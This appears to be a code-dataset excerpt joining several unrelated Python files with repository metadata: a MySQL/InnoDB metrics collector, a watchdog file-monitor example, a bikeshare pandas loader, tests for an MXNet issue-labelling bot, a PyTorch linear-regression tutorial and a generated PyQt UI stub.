if pid is None and PSUTIL_AVAILABLE:
for proc in psutil.process_iter():
try:
if proc.name() == PROC_NAME:
pid = proc.pid
except (psutil.AccessDenied, psutil.ZombieProcess, psutil.NoSuchProcess):
continue
except Exception:
self.log.exception("Error while fetching mysql pid from psutil")
return pid
@classmethod
def _get_stats_from_status(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute("SHOW /*!50002 GLOBAL */ STATUS;")
results = dict(cursor.fetchall())
return results
@classmethod
def _get_stats_from_variables(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute("SHOW GLOBAL VARIABLES;")
results = dict(cursor.fetchall())
return results
def _get_binary_log_stats(self, db):
try:
with closing(db.cursor()) as cursor:
cursor.execute("SHOW BINARY LOGS;")
cursor_results = cursor.fetchall()
master_logs = {result[0]: result[1] for result in cursor_results}
binary_log_space = 0
for key, value in iteritems(master_logs):
binary_log_space += value
return binary_log_space
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Privileges error accessing the BINARY LOGS (must grant REPLICATION CLIENT): %s" % str(e))
return None
def _is_innodb_engine_enabled(self, db):
# Whether InnoDB engine is available or not can be found out either
# from the output of SHOW ENGINES or from information_schema.ENGINES
# table. Later is choosen because that involves no string parsing.
try:
with closing(db.cursor()) as cursor:
cursor.execute(
"select engine from information_schema.ENGINES where engine='InnoDB' and \
support != 'no' and support != 'disabled'"
)
return cursor.rowcount > 0
except (pymysql.err.InternalError, pymysql.err.OperationalError, pymysql.err.NotSupportedError) as e:
self.warning("Possibly innodb stats unavailable - error querying engines table: %s" % str(e))
return False
def _get_replica_stats(self, db, is_mariadb, replication_channel):
replica_results = defaultdict(dict)
try:
with closing(db.cursor(pymysql.cursors.DictCursor)) as cursor:
if is_mariadb and replication_channel:
cursor.execute("SET @@default_master_connection = '{0}';".format(replication_channel))
cursor.execute("SHOW SLAVE STATUS;")
elif replication_channel:
cursor.execute("SHOW SLAVE STATUS FOR CHANNEL '{0}';".format(replication_channel))
else:
cursor.execute("SHOW SLAVE STATUS;")
for slave_result in cursor.fetchall():
# MySQL <5.7 does not have Channel_Name.
# For MySQL >=5.7 'Channel_Name' is set to an empty string by default
channel = replication_channel or slave_result.get('Channel_Name') or 'default'
for key, value in iteritems(slave_result):
if value is not None:
replica_results[key]['channel:{0}'.format(channel)] = value
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
errno, msg = e.args
if errno == 1617 and msg == "There is no master connection '{0}'".format(replication_channel):
# MariaDB complains when you try to get slave status with a
# connection name on the master, without connection name it
# responds an empty string as expected.
# Mysql behaves the same with or without connection name.
pass
else:
self.warning("Privileges error getting replication status (must grant REPLICATION CLIENT): %s" % str(e))
try:
with closing(db.cursor(pymysql.cursors.DictCursor)) as cursor:
cursor.execute("SHOW MASTER STATUS;")
binlog_results = cursor.fetchone()
if binlog_results:
replica_results.update({'Binlog_enabled': True})
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Privileges error getting binlog information (must grant REPLICATION CLIENT): %s" % str(e))
return replica_results
def _get_slave_status(self, db, above_560, nonblocking):
"""
Retrieve the slaves' statuses using:
1. The `performance_schema.threads` table. Non-blocking, requires version > 5.6.0
2. The `information_schema.processlist` table. Blocking
"""
try:
with closing(db.cursor()) as cursor:
if above_560 and nonblocking:
# Query `performance_schema.threads` instead of `
# information_schema.processlist` to avoid mutex impact on performance.
cursor.execute("SELECT THREAD_ID, NAME FROM performance_schema.threads WHERE NAME LIKE '%worker'")
else:
cursor.execute("SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST WHERE COMMAND LIKE '%Binlog dump%'")
slave_results = cursor.fetchall()
slaves = 0
for _ in slave_results:
slaves += 1
return {'Slaves_connected': slaves}
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Privileges error accessing the process tables (must grant PROCESS): %s" % str(e))
return {}
@classmethod
def _are_values_numeric(cls, array):
return all(v.isdigit() for v in array)
def _get_stats_from_innodb_status(self, db):
# There are a number of important InnoDB metrics that are reported in
# InnoDB status but are not otherwise present as part of the STATUS
# variables in MySQL. Majority of these metrics are reported though
# as a part of STATUS variables in Percona Server and MariaDB.
# Requires querying user to have PROCESS privileges.
try:
with closing(db.cursor()) as cursor:
cursor.execute("SHOW /*!50000 ENGINE*/ INNODB STATUS")
except (pymysql.err.InternalError, pymysql.err.OperationalError, pymysql.err.NotSupportedError) as e:
self.warning("Privilege error or engine unavailable accessing the INNODB status \
tables (must grant PROCESS): %s" % str(e))
return {}
if cursor.rowcount < 1:
# No data from SHOW ENGINE STATUS, even though the engine is enabled.
# EG: This could be an Aurora Read Instance
self.warning("""'SHOW ENGINE INNODB STATUS' returned no data.
If you are running an Aurora Read Instace, \
this is expected and you should disable the innodb metrics collection""")
return {}
innodb_status = cursor.fetchone()
innodb_status_text = innodb_status[2]
results = defaultdict(int)
# Here we now parse InnoDB STATUS one line at a time
# This is heavily inspired by the Percona monitoring plugins work
txn_seen = False
prev_line = ''
# Only return aggregated buffer pool metrics
buffer_id = -1
for line in innodb_status_text.splitlines():
line = line.strip()
row = re.split(" +", line)
row = [item.strip(',') for item in row]
row = [item.strip(';') for item in row]
row = [item.strip('[') for item in row]
row = [item.strip(']') for item in row]
if line.startswith('---BUFFER POOL'):
buffer_id = long(row[2])
# SEMAPHORES
if line.find('Mutex spin waits') == 0:
# Mutex spin waits 79626940, rounds 157459864, OS waits 698719
# Mutex spin waits 0, rounds 247280272495, OS waits 316513438
results['Innodb_mutex_spin_waits'] = long(row[3])
results['Innodb_mutex_spin_rounds'] = long(row[5])
results['Innodb_mutex_os_waits'] = long(row[8])
elif line.find('RW-shared spins') == 0 and line.find(';') > 0:
# RW-shared spins 3859028, OS waits 2100750; RW-excl spins
# 4641946, OS waits 1530310
results['Innodb_s_lock_spin_waits'] = long(row[2])
results['Innodb_x_lock_spin_waits'] = long(row[8])
results['Innodb_s_lock_os_waits'] = long(row[5])
results['Innodb_x_lock_os_waits'] = long(row[11])
elif line.find('RW-shared spins') == 0 and line.find('; RW-excl spins') == -1:
# Post 5.5.17 SHOW ENGINE INNODB STATUS syntax
# RW-shared spins 604733, rounds 8107431, OS waits 241268
results['Innodb_s_lock_spin_waits'] = long(row[2])
results['Innodb_s_lock_spin_rounds'] = long(row[4])
results['Innodb_s_lock_os_waits'] = long(row[7])
elif line.find('RW-excl spins') == 0:
# Post 5.5.17 SHOW ENGINE INNODB STATUS syntax
# RW-excl spins 604733, rounds 8107431, OS waits 241268
results['Innodb_x_lock_spin_waits'] = long(row[2])
results['Innodb_x_lock_spin_rounds'] = long(row[4])
results['Innodb_x_lock_os_waits'] = long(row[7])
elif line.find('seconds the semaphore:') > 0:
# --Thread 907205 has waited at handler/ha_innodb.cc line 7156 for 1.00 seconds the semaphore:
results['Innodb_semaphore_waits'] += 1
results[
'Innodb_semaphore_wait_time'] += long(float(row[9])) * 1000
# TRANSACTIONS
elif line.find('Trx id counter') == 0:
# The beginning of the TRANSACTIONS section: start counting
# transactions
# Trx id counter 0 1170664159
# Trx id counter 861B144C
txn_seen = True
elif line.find('History list length') == 0:
# History list length 132
results['Innodb_history_list_length'] = long(row[3])
elif txn_seen and line.find('---TRANSACTION') == 0:
# ---TRANSACTION 0, not started, process no 13510, OS thread id 1170446656
results['Innodb_current_transactions'] += 1
if line.find('ACTIVE') > 0:
results['Innodb_active_transactions'] += 1
elif txn_seen and line.find('------- TRX HAS BEEN') == 0:
# ------- TRX HAS BEEN WAITING 32 SEC FOR THIS LOCK TO BE GRANTED:
results['Innodb_row_lock_time'] += long(row[5]) * 1000
elif line.find('read views open inside InnoDB') > 0:
# 1 read views open inside InnoDB
results['Innodb_read_views'] = long(row[0])
elif line.find('mysql tables in use') == 0:
# mysql tables in use 2, locked 2
results['Innodb_tables_in_use'] += long(row[4])
results['Innodb_locked_tables'] += long(row[6])
elif txn_seen and line.find('lock struct(s)') > 0:
# 23 lock struct(s), heap size 3024, undo log entries 27
# LOCK WAIT 12 lock struct(s), heap size 3024, undo log entries 5
# LOCK WAIT 2 lock struct(s), heap size 368
if line.find('LOCK WAIT') == 0:
results['Innodb_lock_structs'] += long(row[2])
results['Innodb_locked_transactions'] += 1
elif line.find('ROLLING BACK') == 0:
# ROLLING BACK 127539 lock struct(s), heap size 15201832,
# 4411492 row lock(s), undo log entries 1042488
results['Innodb_lock_structs'] += long(row[2])
else:
results['Innodb_lock_structs'] += long(row[0])
# FILE I/O
elif line.find(' OS file reads, ') > 0:
# 8782182 OS file reads, 15635445 OS file writes, 947800 OS
# fsyncs
results['Innodb_os_file_reads'] = long(row[0])
results['Innodb_os_file_writes'] = long(row[4])
results['Innodb_os_file_fsyncs'] = long(row[8])
elif line.find('Pending normal aio reads:') == 0:
try:
if len(row) == 8:
# (len(row) == 8) Pending normal aio reads: 0, aio writes: 0,
results['Innodb_pending_normal_aio_reads'] = long(row[4])
results['Innodb_pending_normal_aio_writes'] = long(row[7])
elif len(row) == 14:
# (len(row) == 14) Pending normal aio reads: 0 [0, 0] , aio writes: 0 [0, 0] ,
results['Innodb_pending_normal_aio_reads'] = long(row[4])
results['Innodb_pending_normal_aio_writes'] = long(row[10])
elif len(row) == 16:
# (len(row) == 16) Pending normal aio reads: [0, 0, 0, 0] , aio writes: [0, 0, 0, 0] ,
if self._are_values_numeric(row[4:8]) and self._are_values_numeric(row[11:15]):
results['Innodb_pending_normal_aio_reads'] = (long(row[4]) + long(row[5]) +
long(row[6]) + long(row[7]))
results['Innodb_pending_normal_aio_writes'] = (long(row[11]) + long(row[12]) +
long(row[13]) + long(row[14]))
# (len(row) == 16) Pending normal aio reads: 0 [0, 0, 0, 0] , aio writes: 0 [0, 0] ,
elif self._are_values_numeric(row[4:9]) and self._are_values_numeric(row[12:15]):
results['Innodb_pending_normal_aio_reads'] = long(row[4])
results['Innodb_pending_normal_aio_writes'] = long(row[12])
else:
self.log.warning("Can't parse result line %s" % line)
elif len(row) == 18:
# (len(row) == 18) Pending normal aio reads: 0 [0, 0, 0, 0] , aio writes: 0 [0, 0, 0, 0] ,
results['Innodb_pending_normal_aio_reads'] = long(row[4])
results['Innodb_pending_normal_aio_writes'] = long(row[12])
elif len(row) == 22:
# (len(row) == 22)
# Pending normal aio reads: 0 [0, 0, 0, 0, 0, 0, 0, 0] , aio writes: 0 [0, 0, 0, 0] ,
results['Innodb_pending_normal_aio_reads'] = long(row[4])
results['Innodb_pending_normal_aio_writes'] = long(row[16])
except ValueError as e:
self.log.warning("Can't parse result line %s: %s", line, e)
elif line.find('ibuf aio reads') == 0:
# ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0
# or ibuf aio reads:, log i/o's:, sync i/o's:
if len(row) == 10:
results['Innodb_pending_ibuf_aio_reads'] = long(row[3])
results['Innodb_pending_aio_log_ios'] = long(row[6])
results['Innodb_pending_aio_sync_ios'] = long(row[9])
elif len(row) == 7:
results['Innodb_pending_ibuf_aio_reads'] = 0
results['Innodb_pending_aio_log_ios'] = 0
results['Innodb_pending_aio_sync_ios'] = 0
elif line.find('Pending flushes (fsync)') == 0:
# Pending flushes (fsync) log: 0; buffer pool: 0
results['Innodb_pending_log_flushes'] = long(row[4])
results['Innodb_pending_buffer_pool_flushes'] = long(row[7])
# INSERT BUFFER AND ADAPTIVE HASH INDEX
elif line.find('Ibuf for space 0: size ') == 0:
# Older InnoDB code seemed to be ready for an ibuf per tablespace. It
# had two lines in the output. Newer has just one line, see below.
# Ibuf for space 0: size 1, free list len 887, seg size 889, is not empty
# Ibuf for space 0: size 1, free list len 887, seg size 889,
results['Innodb_ibuf_size'] = long(row[5])
results['Innodb_ibuf_free_list'] = long(row[9])
results['Innodb_ibuf_segment_size'] = long(row[12])
elif line.find('Ibuf: size ') == 0:
# Ibuf: size 1, free list len 4634, seg size 4636,
results['Innodb_ibuf_size'] = long(row[2])
results['Innodb_ibuf_free_list'] = long(row[6])
results['Innodb_ibuf_segment_size'] = long(row[9])
if line.find('merges') > -1:
results['Innodb_ibuf_merges'] = long(row[10])
elif line.find(', delete mark ') > 0 and prev_line.find('merged operations:') == 0:
# Output of show engine innodb status has changed in 5.5
# merged operations:
# insert 593983, delete mark 387006, delete 73092
results['Innodb_ibuf_merged_inserts'] = long(row[1])
results['Innodb_ibuf_merged_delete_marks'] = long(row[4])
results['Innodb_ibuf_merged_deletes'] = long(row[6])
results['Innodb_ibuf_merged'] = results['Innodb_ibuf_merged_inserts'] + results[
'Innodb_ibuf_merged_delete_marks'] + results['Innodb_ibuf_merged_deletes']
elif line.find(' merged recs, ') > 0:
# 19817685 inserts, 19817684 merged recs, 3552620 merges
results['Innodb_ibuf_merged_inserts'] = long(row[0])
results['Innodb_ibuf_merged'] = long(row[2])
results['Innodb_ibuf_merges'] = long(row[5])
elif line.find('Hash table size ') == 0:
# In some versions of InnoDB, the used cells is omitted.
# Hash table size 4425293, used cells 4229064, ....
# Hash table size 57374437, node heap has 72964 buffer(s) <--
# no used cells
results['Innodb_hash_index_cells_total'] = long(row[3])
results['Innodb_hash_index_cells_used'] = long(
row[6]) if line.find('used cells') > 0 else 0
# LOG
elif line.find(" log i/o's done, ") > 0:
# 3430041 log i/o's done, 17.44 log i/o's/second
# 520835887 log i/o's done, 17.28 log i/o's/second, 518724686
# syncs, 2980893 checkpoints
results['Innodb_log_writes'] = long(row[0])
elif line.find(" pending log writes, ") > 0:
# 0 pending log writes, 0 pending chkp writes
results['Innodb_pending_log_writes'] = long(row[0])
results['Innodb_pending_checkpoint_writes'] = long(row[4])
elif line.find("Log sequence number") == 0:
# This number is NOT printed in hex in InnoDB plugin.
# Log sequence number 272588624
results['Innodb_lsn_current'] = long(row[3])
elif line.find("Log flushed up to") == 0:
# This number is NOT printed in hex in InnoDB plugin.
# Log flushed up to 272588624
results['Innodb_lsn_flushed'] = long(row[4])
elif line.find("Last checkpoint at") == 0:
# Last checkpoint at 272588624
results['Innodb_lsn_last_checkpoint'] = long(row[3])
# BUFFER POOL AND MEMORY
elif line.find("Total memory allocated") == 0 and line.find("in additional pool allocated") > 0:
# Total memory allocated 29642194944; in additional pool allocated 0
# Total memory allocated by read views 96
results['Innodb_mem_total'] = long(row[3])
results['Innodb_mem_additional_pool'] = long(row[8])
elif line.find('Adaptive hash index ') == 0:
# Adaptive hash index 1538240664 (186998824 + 1351241840)
results['Innodb_mem_adaptive_hash'] = long(row[3])
elif line.find('Page hash ') == 0:
# Page hash 11688584
results['Innodb_mem_page_hash'] = long(row[2])
elif line.find('Dictionary cache ') == 0:
# Dictionary cache 145525560 (140250984 + 5274576)
results['Innodb_mem_dictionary'] = long(row[2])
elif line.find('File system ') == 0:
# File system 313848 (82672 + 231176)
results['Innodb_mem_file_system'] = long(row[2])
elif line.find('Lock system ') == 0:
# Lock system 29232616 (29219368 + 13248)
results['Innodb_mem_lock_system'] = long(row[2])
elif line.find('Recovery system ') == 0:
# Recovery system 0 (0 + 0)
results['Innodb_mem_recovery_system'] = long(row[2])
elif line.find('Threads ') == 0:
# Threads 409336 (406936 + 2400)
results['Innodb_mem_thread_hash'] = long(row[1])
elif line.find("Buffer pool size ") == 0:
# The " " after size is necessary to avoid matching the wrong line:
# Buffer pool size 1769471
# Buffer pool size, bytes 28991012864
if buffer_id == -1:
results['Innodb_buffer_pool_pages_total'] = long(row[3])
elif line.find("Free buffers") == 0:
# Free buffers 0
if buffer_id == -1:
results['Innodb_buffer_pool_pages_free'] = long(row[2])
elif line.find("Database pages") == 0:
# Database pages 1696503
if buffer_id == -1:
results['Innodb_buffer_pool_pages_data'] = long(row[2])
elif line.find("Modified db pages") == 0:
# Modified db pages 160602
if buffer_id == -1:
results['Innodb_buffer_pool_pages_dirty'] = long(row[3])
elif line.find("Pages read ahead") == 0:
# Must do this BEFORE the next test, otherwise it'll get fooled by this
# line from the new plugin:
# Pages read ahead 0.00/s, evicted without access 0.06/s
pass
elif line.find("Pages read") == 0:
# Pages read 15240822, created 1770238, written 21705836
if buffer_id == -1:
results['Innodb_pages_read'] = long(row[2])
results['Innodb_pages_created'] = long(row[4])
results['Innodb_pages_written'] = long(row[6])
# ROW OPERATIONS
elif line.find('Number of rows inserted') == 0:
# Number of rows inserted 50678311, updated 66425915, deleted
# 20605903, read 454561562
results['Innodb_rows_inserted'] = long(row[4])
results['Innodb_rows_updated'] = long(row[6])
results['Innodb_rows_deleted'] = long(row[8])
results['Innodb_rows_read'] = long(row[10])
elif line.find(" queries inside InnoDB, ") > 0:
# 0 queries inside InnoDB, 0 queries in queue
results['Innodb_queries_inside'] = long(row[0])
results['Innodb_queries_queued'] = long(row[4])
prev_line = line
# We need to calculate this metric separately
try:
results['Innodb_checkpoint_age'] = results[
'Innodb_lsn_current'] - results['Innodb_lsn_last_checkpoint']
except KeyError as e:
self.log.error("Not all InnoDB LSN metrics available, unable to compute: {0}".format(e))
# Finally we change back the metrics values to string to make the values
# consistent with how they are reported by SHOW GLOBAL STATUS
for metric, value in list(iteritems(results)):
results[metric] = str(value)
return results
def _get_variable_enabled(self, results, var):
enabled = self._collect_string(var, results)
return enabled and enabled.lower().strip() == 'on'
def _get_query_exec_time_95th_us(self, db):
# Fetches the 95th percentile query execution time and returns the value
# in microseconds
sql_95th_percentile = """SELECT `avg_us`, `ro` as `percentile` FROM
(SELECT `avg_us`, @rownum := @rownum + 1 as `ro` FROM
(SELECT ROUND(avg_timer_wait / 1000000) as `avg_us`
FROM performance_schema.events_statements_summary_by_digest
ORDER BY `avg_us` ASC) p,
(SELECT @rownum := 0) r) q
WHERE q.`ro` > ROUND(.95*@rownum)
ORDER BY `percentile` ASC
LIMIT 1"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_95th_percentile)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the perf schema \
'events_statements_summary_by_digest' table.")
return None
row = cursor.fetchone()
query_exec_time_95th_per = row[0]
return query_exec_time_95th_per
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("95th percentile performance metrics unavailable at this time: %s" % str(e))
return None
def _query_exec_time_per_schema(self, db):
# Fetches the avg query execution time per schema and returns the
# value in microseconds
sql_avg_query_run_time = """\
SELECT schema_name, ROUND((SUM(sum_timer_wait) / SUM(count_star)) / 1000000) AS avg_us
FROM performance_schema.events_statements_summary_by_digest
WHERE schema_name IS NOT NULL
GROUP BY schema_name"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_avg_query_run_time)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the perf schema \
'events_statements_summary_by_digest' table.")
return None
schema_query_avg_run_time = {}
for row in cursor.fetchall():
schema_name = str(row[0])
avg_us = long(row[1])
# set the tag as the dictionary key
schema_query_avg_run_time["schema:{0}".format(schema_name)] = avg_us
return schema_query_avg_run_time
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Avg exec time performance metrics unavailable at this time: %s" % str(e))
return None
def _query_size_per_schema(self, db):
# Fetches the avg query execution time per schema and returns the
# value in microseconds
sql_query_schema_size = """
SELECT table_schema,
SUM(data_length+index_length)/1024/1024 AS total_mb
FROM information_schema.tables
GROUP BY table_schema;
"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(sql_query_schema_size)
if cursor.rowcount < 1:
self.warning("Failed to fetch records from the information schema 'tables' table.")
return None
schema_size = {}
for row in cursor.fetchall():
schema_name = str(row[0])
size = long(row[1])
# set the tag as the dictionary key
schema_size["schema:{0}".format(schema_name)] = size
return schema_size
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Avg exec time performance metrics unavailable at this time: %s" % str(e))
return {}
def _compute_synthetic_results(self, results):
if ('Qcache_hits' in results) and ('Qcache_inserts' in results) and ('Qcache_not_cached' in results):
if not int(results['Qcache_hits']):
results['Qcache_utilization'] = 0
else:
results['Qcache_utilization'] = (float(results['Qcache_hits']) /
(int(results['Qcache_inserts']) +
int(results['Qcache_not_cached']) +
int(results['Qcache_hits'])) * 100)
if all(v is not None for v in (self._qcache_hits, self._qcache_inserts, self._qcache_not_cached)):
if not (int(results['Qcache_hits']) - self._qcache_hits):
results['Qcache_instant_utilization'] = 0
else:
top = float(results['Qcache_hits']) - self._qcache_hits
bottom = ((int(results['Qcache_inserts']) - self._qcache_inserts) +
(int(results['Qcache_not_cached']) - self._qcache_not_cached) +
(int(results['Qcache_hits']) - self._qcache_hits))
results['Qcache_instant_utilization'] = ((top / bottom) * 100)
# update all three, or none - for consistent samples.
self._qcache_hits = int(results['Qcache_hits'])
self._qcache_inserts = int(results['Qcache_inserts'])
self._qcache_not_cached = int(results['Qcache_not_cached'])
| [
"bramschuur@gmail.com"
] | bramschuur@gmail.com |
8561b0f2554687e2aae64fddcd6fc36f01415b60 | a38bbada2df886df5336f8843c22b9576c5966d0 | /inotify/watchdog_simple_example.py | a775db357fe5909642212ba67306efeb8b252935 | [] | no_license | Liuxboy/LearningPython | e82edfea6756e887f06f029aac365c571e4eb45d | 7f7423b1d6030ce42ff301fe0c78cd2153a9e6ad | refs/heads/master | 2021-06-24T17:03:27.270077 | 2021-04-30T10:56:54 | 2021-04-30T10:56:54 | 94,400,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Project: LearningPython
# Author: liuchundong <br>
# Date: 2019-7-25 <br>
# Time: 18:15 <br>
# Desc:
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
| [
"342353772@qq.com"
] | 342353772@qq.com |
03af35f09650374be17ae6090d7a5b212218912a | 46d3bfb9dc457c232e71212944abd066ccc76ae9 | /load_data.py | b10ba1f3a374740fb1da634db44be57c289a1f35 | [] | no_license | Mahmoud-Elshaer/Us_bikeshare_data | 04ec265025cd4d94a60a25cae48bc77ad2644d71 | 683d7eab677ae510ce273c5274b3b159359018f1 | refs/heads/master | 2022-12-03T21:02:09.587208 | 2020-08-25T02:57:40 | 2020-08-25T02:57:40 | 290,097,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,536 | py | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv' }
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
# load data file into a dataframe
df = pd.read_csv(CITY_DATA[city])
# convert the Start Time column to datetime
df['Start Time'] = pd.to_datetime(df['Start Time'])
# extract month and day of week from Start Time to create new columns
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.weekday_name
# filter by month if applicable
if month != 'all':
# use the index of the months list to get the corresponding int
months = ['January', 'February', 'March', 'April', 'May', 'June']
month = months.index(month) + 1
# filter by month to create the new dataframe
df = df[df['month'] == month]
# filter by day of week if applicable
if day != 'all':
# filter by day of week to create the new dataframe
df = df[df['day_of_week'] == day.title()]
return df | [
"noreply@github.com"
] | noreply@github.com |
3d9a1aa36617cb12a9d7b956658c16de15f49e6d | 4944178c246ab0811939b32cd192b7ce692b93cd | /services/github-bots/PredictLabels/test_predictor.py | 502c80d390ddf383098b96e434925b6760420fcb | [
"Apache-2.0"
] | permissive | ChaiBapchya/incubator-mxnet-ci | 654dce74904a5afd16abf16fcb34b0caeeac3586 | 0fb0e75b83a371130caf43098ec1e5b12326cb25 | refs/heads/master | 2021-06-27T10:31:17.083300 | 2020-10-12T01:42:50 | 2020-10-12T01:42:50 | 212,455,155 | 0 | 0 | Apache-2.0 | 2019-10-02T22:45:25 | 2019-10-02T22:45:25 | null | UTF-8 | Python | false | false | 4,713 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import requests
import boto3
from botocore.exceptions import ClientError
from botocore.exceptions import NoCredentialsError
from DataFetcher import DataFetcher
import unittest
from Predictor import Predictor
# some version issue
try:
from unittest.mock import patch
except ImportError:
from mock import patch
# test coverage: 100%
class TestLabelBot(unittest.TestCase):
def setUp(self):
self.pr = Predictor()
def test_tokenize(self):
words = self.pr.tokenize("hello_world")
self.assertEqual(words, set(['hello','world']))
def test_rule_based(self):
with patch('DataFetcher.requests.get') as mocked_get:
mocked_get.return_value.status_code = 200
mocked_get.return_value.json.return_value = {
"body": "issue's body",
"created_at": "2018-07-28T18:27:17Z",
"comments": "0",
"number": 11925,
"labels": [{'name': 'Doc'}],
"state": "open",
"title": "a feature requests for scala package",
"html_url": "https://github.com/apache/incubator-mxnet/issues/11925",
}
predictions = self.pr.rule_based([11925])
self.assertEqual([['Feature', 'scala']], predictions)
def test_ml_predict(self):
self.pr.reload(tv_file='Vectorizer.p',
clf_file='Classifier.p',
labels_file='Labels.p')
with patch('DataFetcher.requests.get') as mocked_get:
mocked_get.return_value.status_code = 200
mocked_get.return_value.json.return_value = {
"body": "test",
"created_at": "2018-07-28T18:27:17Z",
"comments": "0",
"number": 11925,
"labels": [{'name': 'Doc'}],
"state": "open",
"title": "a feature requests for scala package",
"html_url": "https://github.com/apache/incubator-mxnet/issues/11925",
}
predictions = self.pr.ml_predict([11925])
self.assertEqual([['Feature']], predictions)
def test_predict(self):
self.pr.reload(tv_file='Vectorizer.p',
clf_file='Classifier.p',
labels_file='Labels.p')
with patch('DataFetcher.requests.get') as mocked_get:
mocked_get.return_value.status_code = 200
mocked_get.return_value.json.return_value = {
"body": "test",
"created_at": "2018-07-28T18:27:17Z",
"comments": "0",
"number": 11925,
"labels": [{'name': 'Doc'}],
"state": "open",
"title": "a feature requests for scala package",
"html_url": "https://github.com/apache/incubator-mxnet/issues/11925",
}
predictions = self.pr.predict([11925])
self.assertEqual([['Feature', 'scala']], predictions)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | noreply@github.com |
09b46d53003a45b84f43ab41e9cbcf1dc1a4b7f2 | e266e97e66b8459dc4f058ff6db4dea0f88d553d | /pytorch_api_linear.py | cb3edd2addf5c77e5e51c90eead451dc4b72bf0a | [] | no_license | ye97/pytorch_b | 9bbce257c12923d51d554eab14442f20407e03b9 | d9314d53f138f6f09cc1306412f53552452f9e33 | refs/heads/master | 2023-03-22T15:18:19.238374 | 2021-03-07T15:16:18 | 2021-03-07T15:16:18 | 343,756,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,350 | py | import torch
#model实现自己的类,继承module模块
class Model(torch.nn.Module):
#继承他的原因是初始化的调用函数要使用他
def __init__(self):
#调用父辈的同名方法都是这样的调用 super(本类名,self).方法
# python中的super( test, self).init()
# 首先找到test的父类(比如是类A),然后把类test的对象self转换为类A的对象,然后“被转换”的类A对象调用自己的__init__函数.
super(Model,self).__init__()
#实例中添加linear函数,使用torch中linear函数,返回得到一个linear对象
self.linear=torch.nn.Linear(1,1)
def forward(self,x):
#实现正向传播图 调用实例对象的linear对象,即上面初始化的对象
return self.linear(x)
model=Model()
#此处loss和optim都是可调用对象,即无参构造,传入参数调用
loss=torch.nn.MSELoss(reduction="sum")
optim=torch.optim.SGD(model.parameters(),lr=0.01)
x_data = torch.Tensor([[1.0], [2.0], [3.0]])
y_data = torch.Tensor([[2.0], [4.0], [6.0]])
for epoch in range(1,1000):
y=model(x_data)
cost=loss(y,y_data)
print(epoch,":",cost.data.item(),cost.data.item())
optim.zero_grad()
cost.backward()
optim.step()
print(model.linear.weight.item())
print(model.linear.bias.item()) | [
"ye79_2020@qq.com"
] | ye79_2020@qq.com |
1f33447947159a11ecf117ebfd09d4a0232c26ed | 890a6921b9dbc3d849ee51366c76a791761d35d2 | /.qt_for_python/uic/PlacefieldVisualSelectionWidgetBase.py | e5bfd84f65b40625dd5b625a786686f1a3fc1927 | [] | no_license | CommanderPho/Spike3D | 87e1ea17a76080e18e835e9d015e7fe7bb3426e4 | 63e5e78c3bcb28f3dbab02d6354e6eb83cbccc2a | refs/heads/master | 2023-08-17T10:40:44.389682 | 2023-08-16T10:57:12 | 2023-08-16T10:57:12 | 413,545,455 | 2 | 0 | null | 2022-10-22T05:54:57 | 2021-10-04T18:48:06 | Jupyter Notebook | UTF-8 | Python | false | false | 4,107 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'c:\Users\pho\repos\pyPhoPlaceCellAnalysis\src\pyphoplacecellanalysis\GUI\Qt\PlacefieldVisualSelectionControls\PlacefieldVisualSelectionWidgetBase.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_rootForm(object):
def setupUi(self, rootForm):
rootForm.setObjectName("rootForm")
rootForm.resize(94, 126)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
